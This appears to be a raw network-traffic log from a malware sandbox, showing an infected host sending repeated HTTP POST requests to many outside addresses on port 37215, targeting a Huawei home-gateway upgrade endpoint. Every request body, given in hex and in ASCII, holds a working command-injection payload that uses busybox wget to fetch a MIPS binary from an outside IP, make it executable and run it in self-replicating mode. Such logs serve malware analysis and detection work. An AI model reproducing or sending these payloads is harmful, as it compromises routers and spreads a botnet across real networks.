                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    51192.168.2.1457132153.104.213.8937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.126415968 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.480134010 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    52192.168.2.145231241.36.102.7237215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.126415968 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.480134010 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    53192.168.2.143730041.216.51.3137215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.127756119 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.501239061 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    54192.168.2.1437272197.238.249.24537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.127756119 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.501240015 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    55192.168.2.1445360197.225.238.5537215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.128878117 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                    Jul 10, 2024 08:26:11.507260084 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
                                                    Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 31 2e 37 39 2e 31 34 31 2e 35 34 20 2d 6c 20 2f 74 6d 70 2f 2e 62 75 6c 75 6c 62 6f 6c 6f 20 2d 72 20 2f 62 6f 6c 6f 6e 65 74 77 6f 72 6b 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f [TRUNCATED]
                                                    Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 51.79.141.54 -l /tmp/.bululbolo -r /bolonetwork.mips; /bin/busybox chmod 777 /tmp/.bululbolo; /tmp/.bululbolo selfrep.bulu)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                    56192.168.2.1436172157.23.38.16937215
                                                    TimestampBytes transferredDirectionData
                                                    Jul 10, 2024 08:26:11.128878117 CEST852OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                    Connection: keep-alive
                                                    Accept: */*
                                                    Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                    Content-Length: 483
